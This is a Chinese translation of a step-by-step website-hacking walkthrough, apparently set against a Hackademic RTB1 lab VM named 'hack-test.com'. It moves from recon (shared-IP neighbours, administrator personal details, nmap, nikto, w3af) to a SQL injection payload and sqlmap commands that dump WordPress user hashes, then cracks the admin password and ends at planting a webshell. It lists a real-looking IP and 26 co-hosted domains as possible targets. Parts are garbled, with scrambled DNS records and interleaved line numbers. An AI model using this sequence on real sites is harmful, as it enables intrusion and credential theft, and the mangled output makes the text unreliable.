送國(guó)外黑客們的入侵網(wǎng)站思路
問題的答案看起來不那么確定,顯而易見的是黑掉一個(gè)站點(diǎn)有很多種方法。在這篇文章,我們的目標(biāo)是要給大家展示一下黑客是如何鎖定并黑掉一個(gè)目標(biāo)站點(diǎn)的!讓我們來看看目標(biāo)站點(diǎn):hack-test.com先ping
問題的答案看起來不那么確定,顯而易見的是黑掉一個(gè)站點(diǎn)有很多種方法。在這篇文章,我們的目標(biāo)是要給大家展示一下黑客是如何鎖定并黑掉一個(gè)目標(biāo)站點(diǎn)的!
讓我們來看看目標(biāo)站點(diǎn):hack-test.com
先ping 下站點(diǎn)所在服務(wù)器的IP :
現(xiàn)在我們有了目標(biāo)站點(diǎn)所在服務(wù)器的IP 了 — 173.236.138.113
然后我們可以找找同個(gè)IP 上的其他站點(diǎn)(旁站:sameip.org ): Same IP 26 sites hosted on IP Address 173.236.138.113
ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net
sportforum.net
,3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com 22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com
總計(jì)有26個(gè)站點(diǎn)在[173.236.138.113]這臺(tái)服務(wù)器上。為了黑掉目標(biāo)站點(diǎn),許多黑客會(huì)把目標(biāo)站點(diǎn)同服的其他站點(diǎn)也劃入攻擊范圍內(nèi)。但是出于學(xué)習(xí)的目的,我們今天暫且將其他站點(diǎn)放在一邊。
我們需要更多關(guān)于目標(biāo)站點(diǎn)的信息(Ps :筆者認(rèn)為在滲透測(cè)試過程中,這比實(shí)施測(cè)試的環(huán)節(jié)來得重要得多。),他們包括:
1.DNS 記錄(A ,NS ,TXT ,MX )
2.WEB 服務(wù)類型(IIS ,APACHE ,TOMCAT )
3. 域名注冊(cè)者的信息(所持有域名公司等)
4. 目標(biāo)站點(diǎn)管理員(相關(guān)人員)的姓名,電話,郵箱和住址等
5. 目標(biāo)站點(diǎn)所支持的腳本類型(PHP ,ASP ,JSP ,ASP.net ,CFM )
6. 目標(biāo)站點(diǎn)的操作系統(tǒng)(UNIX,LINUX,WINDOWS,SOLARIS )
7. 目標(biāo)站點(diǎn)開放的端口
讓我們先來查詢相關(guān)DNS 記錄吧,這里用的是 who.is:
,目標(biāo)站點(diǎn)DNS 記錄信息:
Record Type TTL Priority Content
hack-4 A 173.236.138.113 () test.com hours
ns1.dreamhost.com. hack-4 SOA hostmaster.dreamhost.com. 2011032301 test.com hours 15283 1800 1814400 14400
hack-4 NS ns1.dreamhost.com test.com hours
hack-4 NS ns3.dreamhost.com test.com hours
hack-4 NS ns2.dreamhost.com test.com hours
www.hack-4 A 173.236.138.113 () test.com hours
同時(shí)確認(rèn)WEB 服務(wù)的類型:
顯而易見是Apache ,稍后我們將確定其版本:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
,Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
現(xiàn)在是時(shí)候來查詢目標(biāo)站點(diǎn)持有人(也許可能就是管理員)信息了:
現(xiàn)在我們有了管理員的一些相關(guān)信息了,祭出Backtrack5中的神器 Whatweb 來確認(rèn)操作系統(tǒng)和WEB 服務(wù)版本信息:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
現(xiàn)在我們知道,目標(biāo)站點(diǎn)使用了用PHP 編寫的非常出名的開源博客系統(tǒng)
WordPress ,并且是跑在Fedora 的Linux 發(fā)行版上的,Apache 版本是2.2.15。接下來讓我們看看目標(biāo)站點(diǎn)服務(wù)器開了哪些端口:
祭出神器Nmap
1 – 獲取目標(biāo)服務(wù)器開放的服務(wù)
1 root@bt:/# nmap -sV hack-test.com 2 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET 3 Nmap scan report for hack-test.com (192.168.1.2) 4 Host is up (0.0013s latency). 5 Not shown: 998 filtered ports 6 PORT STATE SERVICE VERSION 7 22/tcp closed ssh 8 80/tcp open http Apache httpd 2.2.15 ((Fedora)) 9 MAC Address: 00:0C:29:01:8A:4D (VMware) 1Service detection performed. Please report any incorrect results at0 http://nmap.org/submit/ . 1Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds 1
2 – 獲取目標(biāo)服務(wù)器操作系統(tǒng)
1 root@bt:/# nmap -O hack-test.com
,2 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET 3 Nmap scan report for hack-test.com (192.168.1.2)
4 Host is up (0.00079s latency).
5 Not shown: 998 filtered ports
6 PORT STATE SERVICE
7 22/tcp closed ssh
8 80/tcp open http
9 MAC Address: 00:0C:29:01:8A:4D (VMware)
1Device type: general purpose
0 Running: Linux 2.6.X
1OS details: Linux 2.6.22 (Fedora Core 6)
1 Network Distance: 1 hop
1OS detection performed. Please report any incorrect results at http2 ://nmap.org/submit/ .
1Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds 3
1
4
1
5
1
6
1
7
1
8
啊哦!~只開了80,而且是 Fedora Core 6 Linux內(nèi)核版本為2.6.22
現(xiàn)在我們已經(jīng)收集了很多關(guān)于目標(biāo)站點(diǎn)的重要信息了。讓我們掃掃他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等. )
讓我們先試試 Nakto.pl 來掃掃,沒準(zhǔn)能搞出點(diǎn)漏洞來
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com – Nikto v2.1.4
—————————————————————————
Target IP: 192.168.1.2 Target Hostname: hack-test.com Target Port: 80 Start Time: 2011-12-29 06:50:03
—————————————————————————
Server: Apache/2.2.15 (Fedora) ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST OSVDB-3268: /icons/:
Directory indexing found. OSVDB-3233: /icons/README: Apache default
,file found. 6448 items checked: 1 error(s) and 6 item(s) reported on remote host End Time: 2011-12-29 06:50:37 (34 seconds) —————————————————————————
同時(shí)試試Wa3f (Ps :哦哇譜死的開源項(xiàng)目,很不錯(cuò)的說~)
1
2 root@bt:/pentest/web/w3af# ./w3af_gui
3 Starting w3af, running on:
4 Python version:
5 2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
6 [GCC 4.4.3]
7 GTK version: 2.20.1
8 PyGTK version: 2.17.0
9 w3af - Web Application Attack and Audit Framework
10 Version: 1.2
11 Revision: 4605
12 Author: Andres Riancho and the w3af team.
13
圖形界面的掃描方式,寫入U(xiǎn)RL 即可。
用以前給雜志社投稿的語氣說,泡杯茶的功夫,等待掃描結(jié)束并查看結(jié)果。 你可以看到很多漏洞信息鳥~先試試SQL 注入。
url – http://hack-test.com/Hackademic_RTB1/?cat=d'z"0 然后 Exploit it!
發(fā)現(xiàn)其他漏洞測(cè)試失敗,用SQLMap 進(jìn)行脫褲吧(猜解數(shù)據(jù)庫(kù)并保存目標(biāo)站點(diǎn)相關(guān)信息到本地) Dump it!
sqlmap -u url
,過一小會(huì)兒能見到如下信息
按n 并回車后你可以看到
哦也~顯錯(cuò)方式的注入點(diǎn),而且爆出的 Mysql的版本信息
用sqlmap 取得所有庫(kù),參數(shù) -dbs
找到三個(gè)庫(kù)
查Wordpress 的庫(kù)中所有表,參數(shù) -D wordpress -tables
然后是列名(這里需要你自己熟悉敏感信息存在哪個(gè)表中呢),參數(shù) -T wp_users -columns
22個(gè)字段(列)
然后查數(shù)據(jù),參數(shù) -C user_login,user_pass –dump 然后解密管理員的hash ,這里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php
明文密碼是q1w2e3(和csdn 庫(kù)的密碼排行榜有得一拼,哈哈~),然后登入后臺(tái)拿webshell 了。